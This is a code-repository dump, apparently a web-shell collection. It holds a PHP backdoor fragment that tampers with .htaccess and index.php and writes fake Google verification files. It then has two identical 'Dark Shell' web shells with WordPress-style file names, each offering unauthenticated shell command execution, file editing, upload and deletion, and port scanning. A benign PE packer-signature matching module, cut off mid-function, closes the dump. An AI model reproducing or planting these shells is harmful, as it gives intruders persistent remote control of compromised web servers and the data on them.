 91 |   return $data;
 92 | }
 93 | 
 94 | rename("./move2.php","./move.php");
 95 | 
 96 | if(isset($_GET['read']) &&  $_GET['read'] == '1'){
 97 | 	$a=file_get_contents(".htaccess");
 98 | 	echo htmlspecialchars($a);
 99 | }
100 | 
101 | if(isset($_GET['chmod']) &&  $_GET['chmod'] == '1'){
102 | 	@chmod(".htaccess",0444);
103 | 	@chmod("index.php",0444);
104 | 	echo "chmod is ok";
105 | }
106 | 
107 | if(isset($_GET['del']) &&  $_GET['del'] == '1'){
108 | 	@chmod("./index.php",0755);
109 | 	$Indexruler = '#(/+installbg.*?/+installend)#s';
110 | 	$strDefault = file_get_contents("./index.php");
111 | 	$strDefault = preg_replace($Indexruler, '', $strDefault);
112 | 	file_put_contents("./index.php",$strDefault);
113 | 	echo "index del is ok";
114 | }
115 | 
116 | 
117 | if(isset($_GET["write"]) && trim($_GET["write"])){
118 | 	$write = trim($_GET["write"]);
119 | 	$path ='./'. $write.'.html';
120 | 	$content='google-site-verification: '.$write.'.html';
121 | 	file_put_contents($path,$content);	
122 | 	echo $content;
123 | 	unlink("move.php");
124 | }
125 | 
126 | ?>
127 | 
128 | 


--------------------------------------------------------------------------------
/shells/wp-darkshell/mide.php:
--------------------------------------------------------------------------------
  1 | <html>
  2 | <head>
  3 | <title>
  4 | Dark Shell
  5 | </title>
  6 | </head>
  7 | <body>
  8 | <style type="text/css">
  9 | body{
 10 | background: #E4E4E4;
 11 | color: #666666;
 12 | font-family: Verdana;
 13 | font-size: 11px;
 14 | }
 15 | a:link{
 16 | color: #33CC99;
 17 | }
 18 | a:visited{
 19 | color: #33CC99;
 20 | }
 21 | a:hover{
 22 | text-decoration: none;
 23 | Color: #3399FF;
 24 | }
 25 | table {
 26 | font-size: 11px;
 27 | }
 28 | </style>
 29 | <?php
 30 | error_reporting (0);
 31 | set_time_limit (0);
 32 | if (empty ($_GET ['dir'])){
 33 | $dir = getcwd ();
 34 | }
 35 | else {
 36 | $dir = $_GET ['dir'];
 37 | }
 38 | chdir ($dir);
 39 | $current = htmlentities ($_SERVER ['PHP_SELF'] . "?dir=" . $dir);
 40 | 
 41 | echo "<center><h1>Dark Shell</h1></center><p><hr><p>\n";
 42 | echo "<i>Server: " . $_SERVER ['SERVER_NAME'] . "<br>\n";
 43 | echo "Current directory: " . getcwd () . "<br>\n";
 44 | echo "Software: " . $_SERVER ['SERVER_SOFTWARE'] . "<pre>\n\n</pre></i>\n";
 45 | echo "<pre>\n\n\n</pre>";
 46 | 
 47 | echo "<table width = 50%>";
 48 | echo "<tr>";
 49 | echo "<td><a href = '".$current."&mode=system'>Shell Command</a></td>\n";
 50 | echo "<td><a href = '".$current."&mode=create'>Create a new file</a></td>\n";
 51 | echo "<td><a href = '".$current."&mode=upload'>Upload file</a></td>\n";
 52 | echo "<td><a href = '".$current."&mode=port_scan'>Port Scan</a></td>\n";
 53 | echo "</tr></table>";
 54 | echo "<pre>\n\n</pre>";
 55 | 
 56 | 
 57 | 
 58 | $mode = $_GET ['mode'];
 59 | switch ($mode){
 60 | case 'edit':
 61 | $file = $_GET ['file'];
 62 | $new = $_POST ['new'];
 63 | if (empty ($new)){
 64 | $fp = fopen ($file, "r");
 65 | $file_cont = fread ($fp, filesize ($file));
 66 | $file_cont = str_replace ("</textarea>", "<textarea>", $file_cont);
 67 | echo "<form action = '".$current."&mode=edit&file=".$file."' method = 'POST'>\n";
 68 | echo "File: ". $file . "<br>\n";
 69 | echo "<textarea name = 'new' rows = '30' cols = '50'>".$file_cont."</textarea><br>\n";
 70 | echo "<input type = 'submit' value = 'Edit'></form>\n";
 71 | }
 72 | else {
 73 | $fp = fopen ($file, "w");
 74 | if (fwrite ($fp, $new)){
 75 | echo $file . " edited.<p>";
 76 | }
 77 | else {
 78 | echo "Unable to edit " . $file . ".<p>";
 79 | }
 80 | }
 81 | fclose ($fp);
 82 | break;
 83 | case 'delete':
 84 | $file = $_GET ['file'];
 85 | if (unlink ($file)){
 86 | echo $file . " deleted successfully.<p>";
 87 | }
 88 | else {
 89 | echo "Unable to delete " . $file . ".<p>";
 90 | }
 91 | break;
 92 | case 'copy':
 93 | $src = $_GET ['src'];
 94 | $dst = $_POST ['dst'];
 95 | if (empty ($dst)){
 96 | echo "<form action = '".$current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
 97 | echo "Destination: <input name = 'dst'><br>\n";
 98 | echo "<input type = 'submit' value = 'Copy'></form>\n";
 99 | }
100 | else {
101 | if (copy ($src, $dst)){
102 | echo "File copied successfully.<p>\n";
103 | }
104 | else {
105 | echo "Unable to copy " . $src . ".<p>\n";
106 | }
107 | }
108 | break;
109 | case 'move':
110 | $src = $_GET ['src'];
111 | $dst = $_POST ['dst'];
112 | if (empty ($dst)){
113 | echo "<form action = '".$current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
114 | echo "Destination: <input name = 'dst'><br>\n";
115 | echo "<input type = 'submit' value = 'Move'></form>\n";
116 | }
117 | else {
118 | if (rename ($src, $dst)){
119 | echo "File moved successfully.<p>\n";
120 | }
121 | else {
122 | echo "Unable to move " . $src . ".<p>\n";
123 | }
124 | }
125 | break;
126 | case 'rename':
127 | $old = $_GET ['old'];
128 | $new = $_POST ['new'];
129 | if (empty ($new)){
130 | echo "<form action = '".$current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
131 | echo "New name: <input name = 'new'><br>\n";
132 | echo "<input type = 'submit' value = 'Rename'></form>\n";
133 | }
134 | else {
135 | if (rename ($old, $new)){
136 | echo "File/Directory renamed successfully.<p>\n";
137 | }
138 | else {
139 | echo "Unable to rename " . $old . ".<p>\n";
140 | }
141 | }
142 | break;
143 | 
144 | case 'rmdir':
145 | $rm = $_GET ['rm'];
146 | if (rmdir ($rm)){
147 | echo "Directory removed successfully.<p>\n";
148 | }
149 | else {
150 | echo "Unable to remove " . $rm . ".<p>\n";
151 | }
152 | break;
153 | case 'system':
154 | $cmd = $_POST ['cmd'];
155 | if (empty ($cmd)){
156 | echo "<form action = '".$current . "&mode=system' method = 'POST'>\n";
157 | echo "Shell Command: <input name = 'cmd'>\n";
158 | echo "<input type = 'submit' value = 'Run'></form><p>\n";
159 | }
160 | else {
161 | system ($cmd);
162 | }
163 | break;
164 | case 'create':
165 | $new = $_POST ['new'];
166 | if (empty ($new)){
167 | echo "<form action = '".$current . "&mode=create' method = 'POST'>\n";
168 | echo "<tr><td>New file: <input name = 'new'></td>\n";
169 | echo "<td><input type = 'submit' value = 'Create'></td></tr></form>\n<p>";
170 | }
171 | else {
172 | if ($fp = fopen ($new, "w")){
173 | echo "File created successfully.<p>\n";
174 | }
175 | else {
176 | echo "Unable to create ".$file.".<p>\n";
177 | }
178 | fclose ($fp);
179 | }
180 | break;
181 | case 'upload':
182 | $temp = $_FILES['upload_file']['tmp_name'];
183 | $file = basename($_FILES['upload_file']['name']);
184 | if (empty ($file)){
185 | echo "<form action = '".$current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
186 | echo "Local file: <input type = 'file' name = 'upload_file'>\n";
187 | echo "<input type = 'submit' value = 'Upload'>\n";
188 | echo "</form>\n<pre>\n\n</pre>";
189 | }
190 | else {
191 | if(move_uploaded_file($temp,$file)){
192 | echo "File uploaded successfully.<p>\n";
193 | unlink ($temp);
194 | }
195 | else {
196 | echo "Unable to upload " . $file . ".<p>\n";
197 | }
198 | }
199 | break;
200 | 
201 | case 'port_scan':
202 | $port_range = $_POST ['port_range'];
203 | if (empty ($port_range)){
204 | echo "<table><form action = '".$current. "&mode=port_scan' method = 'POST'>";
205 | echo "<tr><td><input type = 'text' name = 'port_range'></td><td>";
206 | echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
207 | echo "<tr><td><input type = 'submit' value = 'Port Scan'></td></tr></form></table>";
208 | }
209 | else {
210 | $range = explode (":", $port_range);
211 | if ((!is_numeric ($range [0])) or (!is_numeric ($range [1]))){
212 | echo "Bad parameters.<br>";
213 | }
214 | else {
215 | $host = 'localhost';
216 | $from = $range [0];
217 | $to = $range [1];
218 | echo "Open ports:<br>";
219 | while ($from <= $to){
220 | $var = 0;
221 | $fp = fsockopen ($host, $from) or $var = 1;
222 | if ($var == 0){
223 | echo $from . "<br>";
224 | }
225 | $from++;
226 | fclose ($fp);
227 | }
228 | }
229 | }
230 | break;
231 | 
232 | 
233 | }
234 | 
235 | clearstatcache ();
236 | 
237 | echo "<pre>\n\n</pre>";
238 | echo "<table width = 100%>\n";
239 | $files = scandir ($dir);
240 | foreach ($files as $file){
241 | if (is_file ($file)){
242 | 
243 | $size = round (filesize ($file) / 1024, 2);
244 | echo "<tr><td>".$file."</td>";
245 | echo "<td>".$size." KB</td>";
246 | echo "<td><a href = ".$current . "&mode=edit&file=".$file.">Edit</a></td>\n";
247 | echo "<td><a href = ".$current . "&mode=delete&file=".$file.">Delete</a></td>\n";
248 | echo "<td><a href = ".$current . "&mode=copy&src=".$file.">Copy</a></td>\n";
249 | echo "<td><a href = ".$current . "&mode=move&src=".$file.">Move</a></td>\n";
250 | echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Remame</a></td></tr>\n";
251 | }
252 | else {
253 | $items = scandir ($file);
254 | $items_num = count ($items) - 2;
255 | echo "<tr><td>".$file."</td>";
256 | echo "<td>".$items_num." Items</td>";
257 | echo "<td><a href = ".$current . "/" . $file.">Change directory</a></td>\n";
258 | echo "<td><a href = ".$current . "&mode=rmdir&rm=".$file.">Remove directory</a></td>\n";
259 | echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Rename directory</a></td></tr>\n";
260 | }
261 | }
262 | echo "</table>\n";
263 | ?>
264 | 


--------------------------------------------------------------------------------
/shells/wp-darkshell/popup-pomo.php:
--------------------------------------------------------------------------------
  1 | <html>
  2 | <head>
  3 | <title>
  4 | Dark Shell
  5 | </title>
  6 | </head>
  7 | <body>
  8 | <style type="text/css">
  9 | body{
 10 | background: #E4E4E4;
 11 | color: #666666;
 12 | font-family: Verdana;
 13 | font-size: 11px;
 14 | }
 15 | a:link{
 16 | color: #33CC99;
 17 | }
 18 | a:visited{
 19 | color: #33CC99;
 20 | }
 21 | a:hover{
 22 | text-decoration: none;
 23 | Color: #3399FF;
 24 | }
 25 | table {
 26 | font-size: 11px;
 27 | }
 28 | </style>
 29 | <?php
 30 | error_reporting (0);
 31 | set_time_limit (0);
 32 | if (empty ($_GET ['dir'])){
 33 | $dir = getcwd ();
 34 | }
 35 | else {
 36 | $dir = $_GET ['dir'];
 37 | }
 38 | chdir ($dir);
 39 | $current = htmlentities ($_SERVER ['PHP_SELF'] . "?dir=" . $dir);
 40 | 
 41 | echo "<center><h1>Dark Shell</h1></center><p><hr><p>\n";
 42 | echo "<i>Server: " . $_SERVER ['SERVER_NAME'] . "<br>\n";
 43 | echo "Current directory: " . getcwd () . "<br>\n";
 44 | echo "Software: " . $_SERVER ['SERVER_SOFTWARE'] . "<pre>\n\n</pre></i>\n";
 45 | echo "<pre>\n\n\n</pre>";
 46 | 
 47 | echo "<table width = 50%>";
 48 | echo "<tr>";
 49 | echo "<td><a href = '".$current."&mode=system'>Shell Command</a></td>\n";
 50 | echo "<td><a href = '".$current."&mode=create'>Create a new file</a></td>\n";
 51 | echo "<td><a href = '".$current."&mode=upload'>Upload file</a></td>\n";
 52 | echo "<td><a href = '".$current."&mode=port_scan'>Port Scan</a></td>\n";
 53 | echo "</tr></table>";
 54 | echo "<pre>\n\n</pre>";
 55 | 
 56 | 
 57 | 
 58 | $mode = $_GET ['mode'];
 59 | switch ($mode){
 60 | case 'edit':
 61 | $file = $_GET ['file'];
 62 | $new = $_POST ['new'];
 63 | if (empty ($new)){
 64 | $fp = fopen ($file, "r");
 65 | $file_cont = fread ($fp, filesize ($file));
 66 | $file_cont = str_replace ("</textarea>", "<textarea>", $file_cont);
 67 | echo "<form action = '".$current."&mode=edit&file=".$file."' method = 'POST'>\n";
 68 | echo "File: ". $file . "<br>\n";
 69 | echo "<textarea name = 'new' rows = '30' cols = '50'>".$file_cont."</textarea><br>\n";
 70 | echo "<input type = 'submit' value = 'Edit'></form>\n";
 71 | }
 72 | else {
 73 | $fp = fopen ($file, "w");
 74 | if (fwrite ($fp, $new)){
 75 | echo $file . " edited.<p>";
 76 | }
 77 | else {
 78 | echo "Unable to edit " . $file . ".<p>";
 79 | }
 80 | }
 81 | fclose ($fp);
 82 | break;
 83 | case 'delete':
 84 | $file = $_GET ['file'];
 85 | if (unlink ($file)){
 86 | echo $file . " deleted successfully.<p>";
 87 | }
 88 | else {
 89 | echo "Unable to delete " . $file . ".<p>";
 90 | }
 91 | break;
 92 | case 'copy':
 93 | $src = $_GET ['src'];
 94 | $dst = $_POST ['dst'];
 95 | if (empty ($dst)){
 96 | echo "<form action = '".$current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
 97 | echo "Destination: <input name = 'dst'><br>\n";
 98 | echo "<input type = 'submit' value = 'Copy'></form>\n";
 99 | }
100 | else {
101 | if (copy ($src, $dst)){
102 | echo "File copied successfully.<p>\n";
103 | }
104 | else {
105 | echo "Unable to copy " . $src . ".<p>\n";
106 | }
107 | }
108 | break;
109 | case 'move':
110 | $src = $_GET ['src'];
111 | $dst = $_POST ['dst'];
112 | if (empty ($dst)){
113 | echo "<form action = '".$current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
114 | echo "Destination: <input name = 'dst'><br>\n";
115 | echo "<input type = 'submit' value = 'Move'></form>\n";
116 | }
117 | else {
118 | if (rename ($src, $dst)){
119 | echo "File moved successfully.<p>\n";
120 | }
121 | else {
122 | echo "Unable to move " . $src . ".<p>\n";
123 | }
124 | }
125 | break;
126 | case 'rename':
127 | $old = $_GET ['old'];
128 | $new = $_POST ['new'];
129 | if (empty ($new)){
130 | echo "<form action = '".$current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
131 | echo "New name: <input name = 'new'><br>\n";
132 | echo "<input type = 'submit' value = 'Rename'></form>\n";
133 | }
134 | else {
135 | if (rename ($old, $new)){
136 | echo "File/Directory renamed successfully.<p>\n";
137 | }
138 | else {
139 | echo "Unable to rename " . $old . ".<p>\n";
140 | }
141 | }
142 | break;
143 | 
144 | case 'rmdir':
145 | $rm = $_GET ['rm'];
146 | if (rmdir ($rm)){
147 | echo "Directory removed successfully.<p>\n";
148 | }
149 | else {
150 | echo "Unable to remove " . $rm . ".<p>\n";
151 | }
152 | break;
153 | case 'system':
154 | $cmd = $_POST ['cmd'];
155 | if (empty ($cmd)){
156 | echo "<form action = '".$current . "&mode=system' method = 'POST'>\n";
157 | echo "Shell Command: <input name = 'cmd'>\n";
158 | echo "<input type = 'submit' value = 'Run'></form><p>\n";
159 | }
160 | else {
161 | system ($cmd);
162 | }
163 | break;
164 | case 'create':
165 | $new = $_POST ['new'];
166 | if (empty ($new)){
167 | echo "<form action = '".$current . "&mode=create' method = 'POST'>\n";
168 | echo "<tr><td>New file: <input name = 'new'></td>\n";
169 | echo "<td><input type = 'submit' value = 'Create'></td></tr></form>\n<p>";
170 | }
171 | else {
172 | if ($fp = fopen ($new, "w")){
173 | echo "File created successfully.<p>\n";
174 | }
175 | else {
176 | echo "Unable to create ".$file.".<p>\n";
177 | }
178 | fclose ($fp);
179 | }
180 | break;
181 | case 'upload':
182 | $temp = $_FILES['upload_file']['tmp_name'];
183 | $file = basename($_FILES['upload_file']['name']);
184 | if (empty ($file)){
185 | echo "<form action = '".$current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
186 | echo "Local file: <input type = 'file' name = 'upload_file'>\n";
187 | echo "<input type = 'submit' value = 'Upload'>\n";
188 | echo "</form>\n<pre>\n\n</pre>";
189 | }
190 | else {
191 | if(move_uploaded_file($temp,$file)){
192 | echo "File uploaded successfully.<p>\n";
193 | unlink ($temp);
194 | }
195 | else {
196 | echo "Unable to upload " . $file . ".<p>\n";
197 | }
198 | }
199 | break;
200 | 
201 | case 'port_scan':
202 | $port_range = $_POST ['port_range'];
203 | if (empty ($port_range)){
204 | echo "<table><form action = '".$current. "&mode=port_scan' method = 'POST'>";
205 | echo "<tr><td><input type = 'text' name = 'port_range'></td><td>";
206 | echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
207 | echo "<tr><td><input type = 'submit' value = 'Port Scan'></td></tr></form></table>";
208 | }
209 | else {
210 | $range = explode (":", $port_range);
211 | if ((!is_numeric ($range [0])) or (!is_numeric ($range [1]))){
212 | echo "Bad parameters.<br>";
213 | }
214 | else {
215 | $host = 'localhost';
216 | $from = $range [0];
217 | $to = $range [1];
218 | echo "Open ports:<br>";
219 | while ($from <= $to){
220 | $var = 0;
221 | $fp = fsockopen ($host, $from) or $var = 1;
222 | if ($var == 0){
223 | echo $from . "<br>";
224 | }
225 | $from++;
226 | fclose ($fp);
227 | }
228 | }
229 | }
230 | break;
231 | 
232 | 
233 | }
234 | 
235 | clearstatcache ();
236 | 
237 | echo "<pre>\n\n</pre>";
238 | echo "<table width = 100%>\n";
239 | $files = scandir ($dir);
240 | foreach ($files as $file){
241 | if (is_file ($file)){
242 | 
243 | $size = round (filesize ($file) / 1024, 2);
244 | echo "<tr><td>".$file."</td>";
245 | echo "<td>".$size." KB</td>";
246 | echo "<td><a href = ".$current . "&mode=edit&file=".$file.">Edit</a></td>\n";
247 | echo "<td><a href = ".$current . "&mode=delete&file=".$file.">Delete</a></td>\n";
248 | echo "<td><a href = ".$current . "&mode=copy&src=".$file.">Copy</a></td>\n";
249 | echo "<td><a href = ".$current . "&mode=move&src=".$file.">Move</a></td>\n";
250 | echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Remame</a></td></tr>\n";
251 | }
252 | else {
253 | $items = scandir ($file);
254 | $items_num = count ($items) - 2;
255 | echo "<tr><td>".$file."</td>";
256 | echo "<td>".$items_num." Items</td>";
257 | echo "<td><a href = ".$current . "/" . $file.">Change directory</a></td>\n";
258 | echo "<td><a href = ".$current . "&mode=rmdir&rm=".$file.">Remove directory</a></td>\n";
259 | echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Rename directory</a></td></tr>\n";
260 | }
261 | }
262 | echo "</table>\n";
263 | ?>
264 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/peutils.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: Latin-1 -*-
  2 | """peutils, Portable Executable utilities module
  3 | 
  4 | 
  5 | Copyright (c) 2005-2012 Ero Carrera <ero.carrera@gmail.com>
  6 | 
  7 | All rights reserved.
  8 | 
  9 | For detailed copyright information see the file COPYING in
 10 | the root of the distribution archive.
 11 | """
 12 | 
 13 | import os
 14 | import re
 15 | import string
 16 | import urllib
 17 | import pefile
 18 | 
 19 | __author__ = 'Ero Carrera'
 20 | __version__ = pefile.__version__
 21 | __contact__ = 'ero.carrera@gmail.com'
 22 | 
 23 | 
 24 | 
 25 | 
 26 | class SignatureDatabase:
 27 |     """This class loads and keeps a parsed PEiD signature database.
 28 | 
 29 |     Usage:
 30 | 
 31 |         sig_db = SignatureDatabase('/path/to/signature/file')
 32 | 
 33 |     and/or
 34 | 
 35 |         sig_db = SignatureDatabase()
 36 |         sig_db.load('/path/to/signature/file')
 37 | 
 38 |     Signature databases can be combined by performing multiple loads.
 39 | 
 40 |     The filename parameter can be a URL too. In that case the
 41 |     signature database will be downloaded from that location.
 42 |     """
 43 | 
 44 |     def __init__(self, filename=None, data=None):
 45 | 
 46 |         # RegExp to match a signature block
 47 |         #
 48 |         self.parse_sig = re.compile(
 49 |             '\[(.*?)\]\s+?signature\s*=\s*(.*?)(\s+\?\?)*\s*ep_only\s*=\s*(\w+)(?:\s*section_start_only\s*=\s*(\w+)|)', re.S)
 50 | 
 51 |         # Signature information
 52 |         #
 53 |         # Signatures are stored as trees using dictionaries
 54 |         # The keys are the byte values while the values for
 55 |         # each key are either:
 56 |         #
 57 |         # - Other dictionaries of the same form for further
 58 |         #   bytes in the signature
 59 |         #
 60 |         # - A dictionary with a string as a key (packer name)
 61 |         #   and None as value to indicate a full signature
 62 |         #
 63 |         self.signature_tree_eponly_true = dict ()
 64 |         self.signature_count_eponly_true = 0
 65 |         self.signature_tree_eponly_false = dict ()
 66 |         self.signature_count_eponly_false = 0
 67 |         self.signature_tree_section_start = dict ()
 68 |         self.signature_count_section_start = 0
 69 | 
 70 |         # The depth (length) of the longest signature
 71 |         #
 72 |         self.max_depth = 0
 73 | 
 74 |         self.__load(filename=filename, data=data)
 75 | 
 76 |     def generate_section_signatures(self, pe, name, sig_length=512):
 77 |         """Generates signatures for all the sections in a PE file.
 78 | 
 79 |         If the section contains any data a signature will be created
 80 |         for it. The signature name will be a combination of the
 81 |         parameter 'name' and the section number and its name.
 82 |         """
 83 | 
 84 |         section_signatures = list()
 85 | 
 86 |         for idx, section in enumerate(pe.sections):
 87 | 
 88 |             if section.SizeOfRawData < sig_length:
 89 |                 continue
 90 | 
 91 |             #offset = pe.get_offset_from_rva(section.VirtualAddress)
 92 |             offset = section.PointerToRawData
 93 | 
 94 |             sig_name = '%s Section(%d/%d,%s)' % (
 95 |                 name, idx + 1, len(pe.sections),
 96 |                 ''.join([c for c in section.Name if c in string.printable]))
 97 | 
 98 |             section_signatures.append(
 99 |                 self.__generate_signature(
100 |                     pe, offset, sig_name, ep_only=False,
101 |                     section_start_only=True,
102 |                     sig_length=sig_length) )
103 | 
104 |         return '\n'.join(section_signatures)+'\n'
105 | 
106 | 
107 | 
108 |     def generate_ep_signature(self, pe, name, sig_length=512):
109 |         """Generate signatures for the entry point of a PE file.
110 | 
111 |         Creates a signature whose name will be the parameter 'name'
112 |         and the section number and its name.
113 |         """
114 | 
115 |         offset = pe.get_offset_from_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint)
116 | 
117 |         return self.__generate_signature(
118 |             pe, offset, name, ep_only=True, sig_length=sig_length)
119 | 
120 | 
121 | 
122 |     def __generate_signature(self, pe, offset, name, ep_only=False,
123 |             section_start_only=False, sig_length=512):
124 | 
125 |         data = pe.__data__[offset:offset+sig_length]
126 | 
127 |         signature_bytes = ' '.join(['%02x' % ord(c) for c in data])
128 | 
129 |         if ep_only == True:
130 |             ep_only = 'true'
131 |         else:
132 |             ep_only = 'false'
133 | 
134 |         if section_start_only == True:
135 |             section_start_only = 'true'
136 |         else:
137 |             section_start_only = 'false'
138 | 
139 |         signature = '[%s]\nsignature = %s\nep_only = %s\nsection_start_only = %s\n' % (
140 |             name, signature_bytes, ep_only, section_start_only)
141 | 
142 |         return signature
143 | 
144 |     def match(self, pe, ep_only=True, section_start_only=False):
145 |         """Matches and returns the exact match(es).
146 | 
147 |         If ep_only is True the result will be a string with
148 |         the packer name. Otherwise it will be a list of the
149 |         form (file_ofsset, packer_name). Specifying where
150 |         in the file the signature was found.
151 |         """
152 | 
153 |         matches = self.__match(pe, ep_only, section_start_only)
154 | 
155 |         # The last match (the most precise) from the
156 |         # list of matches (if any) is returned
157 |         #
158 |         if matches:
159 |             if ep_only == False:
160 |                 # Get the most exact match for each list of matches
161 |                 # at a given offset
162 |                 #
163 |                 return [(match[0], match[1][-1]) for match in matches]
164 | 
165 |             return matches[1][-1]
166 | 
167 |         return None
168 | 
169 |     def match_all(self, pe, ep_only=True, section_start_only=False):
170 |         """Matches and returns all the likely matches."""
171 | 
172 |         matches = self.__match(pe, ep_only, section_start_only)
173 | 
174 |         if matches:
175 |             if ep_only == False:
176 |                 # Get the most exact match for each list of matches
177 |                 # at a given offset
178 |                 #
179 |                 return matches
180 | 
181 |             return matches[1]
182 | 
183 |         return None
184 | 
185 |     def __match(self, pe, ep_only, section_start_only):
186 | 
187 |         # Load the corresponding set of signatures
188 |         # Either the one for ep_only equal to True or
189 |         # to False
190 |         #
191 |         if section_start_only is True:
192 | 
193 |             # Fetch the data of the executable as it'd
194 |             # look once loaded in memory
195 |             #
196 |             try :
197 |                 data = pe.__data__
198 |             except Exception, excp :
199 |                 raise
200 | 
201 |             # Load the corresponding tree of signatures
202 |             #
203 |             signatures = self.signature_tree_section_start
204 | 
205 |             # Set the starting address to start scanning from
206 |             #
207 |             scan_addresses = [section.PointerToRawData for section in pe.sections]
208 | 
209 |         elif ep_only is True:
210 | 
211 |             # Fetch the data of the executable as it'd
212 |             # look once loaded in memory
213 |             #
214 |             try :
215 |                 data = pe.get_memory_mapped_image()
216 |             except Exception, excp :
217 |                 raise
218 | 
219 |             # Load the corresponding tree of signatures
220 |             #
221 |             signatures = self.signature_tree_eponly_true
222 | 
223 |             # Fetch the entry point of the PE file and the data
224 |             # at the entry point
225 |             #
226 |             ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
227 | 
228 |             # Set the starting address to start scanning from
229 |             #
230 |             scan_addresses = [ep]
231 | 
232 |         else:
233 | 
234 |             data = pe.__data__
235 | 
236 |             signatures = self.signature_tree_eponly_false
237 | 
238 |             scan_addresses = xrange( len(data) )
239 | 
240 |         # For each start address, check if any signature matches
241 |         #
242 |         matches = []
243 |         for idx in scan_addresses:
244 |             result = self.__match_signature_tree(
245 |                 signatures,
246 |                 data[idx:idx+self.max_depth])
247 |             if result:
248 |                 matches.append( (idx, result) )
249 | 
250 |         # Return only the matched items found at the entry point if
251 |         # ep_only is True (matches will have only one element in that
252 |         # case)
253 |         #
254 |         if ep_only is True:
255 |             if matches:
256 |                 return matches[0]
257 | 
258 |         return matches
259 | 
260 | 
261 |     def match_data(self, code_data, ep_only=True, section_start_only=False):
262 | 
263 |         data = code_data
264 |         scan_addresses = [ 0 ]
265 | 
266 |         # Load the corresponding set of signatures
267 |         # Either the one for ep_only equal to True or
268 |         # to False
269 |         #
270 |         if section_start_only is True:
271 | 
272 |             # Load the corresponding tree of signatures
273 |             #
274 |             signatures = self.signature_tree_section_start
275 | 
276 |             # Set the starting address to start scanning from
277 |             #
278 | 
279 |         elif ep_only is True:
280 | 
281 |             # Load the corresponding tree of signatures
282 |             #
283 |             signatures = self.signature_tree_eponly_true
284 | 
285 | 
286 |         # For each start address, check if any signature matches
287 |         #
288 |         matches = []
289 |         for idx in scan_addresses:
290 |             result = self.__match_signature_tree(
291 |                 signatures,
292 |                 data[idx:idx+self.max_depth])
293 |             if result:
294 |                 matches.append( (idx, result) )
295 | 
296 |         # Return only the matched items found at the entry point if
297 |         # ep_only is True (matches will have only one element in that
298 |         # case)
299 |         #
300 |         if ep_only is True:
301 |             if matches:
302 |                 return matches[0]
303 | 
304 |         return matches
305 | 
306 | 
307 |     def __match_signature_tree(self, signature_tree, data, depth = 0):
308 |         """Recursive function to find matches along the signature tree.
309 | 
310 |         signature_tree  is the part of the tree left to walk
311 |         data    is the data being checked against the signature tree
312 |         depth   keeps track of how far we have gone down the tree
313 |         """
314 | 
315 | 
316 |         matched_names = list ()
317 |         match = signature_tree
318 | 
319 |         # Walk the bytes in the data and match them
320 |         # against the signature
321 |         #
322 |         for idx, byte in enumerate ( [ord (b) for b in data] ):
323 | 
324 |             # If the tree is exhausted...
325 |             #
326 |             if match is None :
327 |                 break
328 | 
329 |             # Get the next byte in the tree
330 |             #
331 |             match_next = match.get(byte, None)
332 | 
333 | 
334 |             # If None is among the values for the key
335 |             # it means that a signature in the database
336 |             # ends here and that there's an exact match.
337 |             #
338 |             if None in match.values():
339 |                 # idx represent how deep we are in the tree
340 |                 #
341 |                 #names = [idx+depth]
342 |                 names = list()
343 | 
344 |                 # For each of the item pairs we check
345 |                 # if it has an element other than None,
346 |                 # if not then we have an exact signature
347 |                 #
348 |                 for item in match.items():
349 |                     if item[1] is None :
350 |                         names.append (item[0])
351 |                 matched_names.append(names)
352 | 
353 |             # If a wildcard is found keep scanning the signature
354 |             # ignoring the byte.
355 |             #
356 |             if match.has_key ('??') :
357 |                 match_tree_alternate = match.get ('??', None)
358 |                 data_remaining = data[idx + 1 :]
359 |                 if data_remaining:
360 |                     matched_names.extend(
361 |                         self.__match_signature_tree(
362 |                             match_tree_alternate, data_remaining, idx+depth+1))
363 | 
364 |             match = match_next
365 | 
366 |         # If we have any more packer name in the end of the signature tree
367 |         # add them to the matches
368 |         #
369 |         if match is not None and None in match.values():
370 |             #names = [idx + depth + 1]
371 |             names = list()
372 |             for item in match.items() :
373 |                 if item[1] is None:
374 |                     names.append(item[0])
375 |             matched_names.append(names)
376 | 
377 |         return matched_names
378 | 
379 |     def load(self , filename=None, data=None):
380 |         """Load a PEiD signature file.
381 | 
382 |         Invoking this method on different files combines the signatures.
383 |         """
384 | 
385 |         self.__load(filename=filename, data=data)
386 | 
387 |     def __load(self, filename=None, data=None):
388 | 
389 | 
390 |         if filename is not None:
391 |             # If the path does not exist, attempt to open a URL
392 |             #
393 |             if not os.path.exists(filename):
394 |                 try:
395 |                     sig_f = urllib.urlopen(filename)
396 |                     sig_data = sig_f.read()
397 |                     sig_f.close()
398 |                 except IOError:
399 |                     # Let this be raised back to the user...
400 |                     raise
401 |             else:
402 |                 # Get the data for a file
403 |                 #
404 |                 try:
405 |                     sig_f = file( filename, 'rt' )
406 |                     sig_data = sig_f.read()
407 |                     sig_f.close()
408 |                 except IOError:
409 |                     # Let this be raised back to the user...
410 |                     raise
411 |         else:
412 |             sig_data = data
413 | 
414 |         # If the file/URL could not be read or no "raw" data
415 |         # was provided there's nothing else to do
416 |         #
417 |         if not sig_data:
418 |             return
419 | 
420 |         # Helper function to parse the signature bytes
421 |         #
422 |         def to_byte(value) :
423 |             if value == '??' or value == '?0' :
424 |                 return value
425 |             return int (value, 16)
426 | 
427 | 
428 |         # Parse all the signatures in the file
429 |         #
430 |         matches = self.parse_sig.findall(sig_data)
431 | 
432 |         # For each signature, get the details and load it into the
433 |         # signature tree
434 |         #
435 |         for packer_name, signature, superfluous_wildcards, ep_only, section_start_only in matches:
436 | 
437 |             ep_only = ep_only.strip().lower()
